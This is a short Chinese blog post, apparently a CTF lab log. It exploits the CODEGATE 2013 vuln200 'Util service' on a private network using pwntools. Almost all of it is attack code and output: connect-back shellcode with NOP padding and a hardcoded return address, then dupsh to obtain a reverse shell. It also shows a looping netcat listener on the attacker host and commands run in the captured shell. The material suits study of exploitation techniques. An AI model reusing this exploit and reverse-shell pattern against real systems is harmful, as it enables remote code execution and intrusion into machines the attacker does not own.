标签:
======================= try 1 =======================
from pwn import *
r=remote(‘192.168.1.104‘,7777)
>>> r=remote(‘192.168.1.104‘,7777)
[x] Opening connection to 192.168.1.104 on port 7777
[x] Opening connection to 192.168.1.104 on port 7777: Trying 192.168.1.104
[+] Opening connection to 192.168.1.104 on port 7777: Done
>>> print(r.recv(1024))
CODEGATE 2013 Util service!
[*] md5
[*] help
[*] base64 encode
[*] base64 decode
[*] quit
>>> r.send(‘write‘ + (asm(shellcraft.i386.linux.connect(‘192.168.1.109‘,7777)).ljust(0xf0, ‘\x90‘)+p32(0xbfdf18cc)))
攻击端监听服务 :
# strace -f nc -l -p 7777
......
bind(3, {sa_family=AF_INET, sin_port=htons(7777), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1) = 0
rt_sigaction(SIGALRM, {SIG_IGN, [ALRM], SA_RESTORER|SA_RESTART, 0x7fc9a4d1f180}, {SIG_DFL, [], 0}, 8) = 0
alarm(0) = 0
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
accept(3, {sa_family=AF_INET, sin_port=htons(50967), sin_addr=inet_addr("192.168.1.104")}, [16]) = 4
......
======================= try 2 =======================
攻击端:
r.close()
r=remote(‘192.168.1.104‘,7777)
print(r.recv(1024))
r.send(‘write‘ + (asm(shellcraft.i386.linux.connect(‘192.168.1.109‘,7777)+shellcraft.i386.linux.dupsh(sock=‘ebp‘))).ljust(0xf0, ‘\x90‘)+p32(0xbfdf18cc))
反向shell:
# while [ 1 ];do nc -n -vv -l -p 7777;done
listening on [any] 7777 ...
connect to [192.168.1.109] from (UNKNOWN) [192.168.1.104] 50969
ls
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
5b7420a5bcdc1da85bccc62dcea4c7b8
README.md
doit.py
dump.txt
harness.py
pwd
/opt/ctf/pwn/pwntools-write-ups-master/2013/codegate-quals/vuln200
ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:24:54:7b:d2:d9
inet addr:192.168.1.104 Bcast:192.168.1.255 Mask:255.255.255.0
......
标签:
原文地址:http://www.cnblogs.com/scoder/p/5049665.html